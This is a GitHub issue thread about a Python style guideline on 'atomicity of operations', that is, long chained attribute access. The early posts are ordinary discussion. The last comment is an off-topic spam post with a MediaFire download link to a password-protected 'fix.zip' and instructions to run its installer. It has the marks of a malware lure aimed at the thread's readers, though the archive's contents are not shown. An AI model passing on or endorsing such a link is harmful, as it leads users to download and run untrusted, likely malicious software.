### ISSUE TITLE
Discussion about atomicity of operations

### ISSUE THREAD

**Issue by nifadyev** [evrone/evrone-python-guidelines#3]
Let's discuss improvements and changes related to [atomicity of operations](https://github.com/evrone/evrone-python-guidelines/blob/master/EN.md#atomicity-of-operations).
If you have any experience, example, or snippet to share, feel free to suggest it into this discussion.

**Comment by nifadyev** [comment]
Summary from company chat:

- Attribute names might be long and chained attribute call will turn into a long string. It rarely means something good if you climb through several “dots” in expression.
- Django ORM is a different story and requires separate note
- Rule was written before [PEP-678](https://peps.python.org/pep-0678/). Try to figure out the error if an exception is thrown in such a chain `foo.bar.bar.bar.bar.bar.bar.bar` (`nonetype object has no attribute bar`)

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
